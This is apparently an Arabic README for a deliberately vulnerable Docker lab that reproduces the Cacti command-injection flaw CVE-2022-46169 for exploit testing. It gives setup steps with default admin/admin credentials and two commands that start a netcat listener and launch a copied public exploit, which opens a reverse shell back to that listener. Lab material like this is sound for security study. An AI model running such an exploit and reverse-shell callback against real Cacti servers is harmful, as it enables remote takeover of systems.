
تحذير: هذا تطبيق ضعيف لاختبار استغلال ثغرة حقن الأوامر في Cacti (CVE-2022-46169). قم بتشغيله على مسؤوليتك الخاصة!
هذا تطبيق ضعيف لاختبار استغلال ثغرة Cacti (CVE-2022-46169).
يحتوي هذا التطبيق على ثغرات أمنية خطيرة. قم بتشغيله على مسؤوليتك الخاصة! يُوصى باستخدام بيئة مدعومة ومعزولة (مثل جهاز افتراضي مع لقطة حديثة وشبكة مضيفة فقط). لا تقم برفع هذا التطبيق إلى أي خوادم مواجهة للإنترنت، حيث سيتم اختراقها.
إخلاء مسؤولية: لا أتحمل المسؤولية عن الطريقة التي يستخدم بها أي شخص هذا التطبيق. الغرض الوحيد من هذا التطبيق هو أن يكون سيناريو اختبار لاستغلال CVE-2022-46169 ولا ينبغي استخدامه بشكل ضار. إذا تم اختراق خادمك من خلال تثبيت هذا التطبيق، فهذه ليست مسؤوليتي، بل مسؤولية الشخص (أو الأشخاص) الذين قاموا برفعه وتثبيته.
فيما يلي خطوات إعداد البيئة:
docker compose up -d لبدء التشكيل.admin/admin.سيتم تسمية الحاوية vuln-cacti.
لـ إزالة البيئة استخدم الأمر docker compose down.
يمكن العثور على دليل التثبيت الرسمي لـ Cacti هنا.
السبب الجذري التفصيلي للثغرة متاح هنا.
استغلال عام متاح على Exploit-DB. تم نسخه تحت مجلد exploit/ للتبسيط.
لتشغيله:
nc -lvp 6669
./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
host.docker.internal يُستخدم للوصول إلى الجهاز المضيف من الحاوية (مرجع).هناك أيضًا إدخال في مستودع vulhub.
هذا المشروع مرخص بموجب Unlicense - راجع ملف LICENSE للحصول على التفاصيل.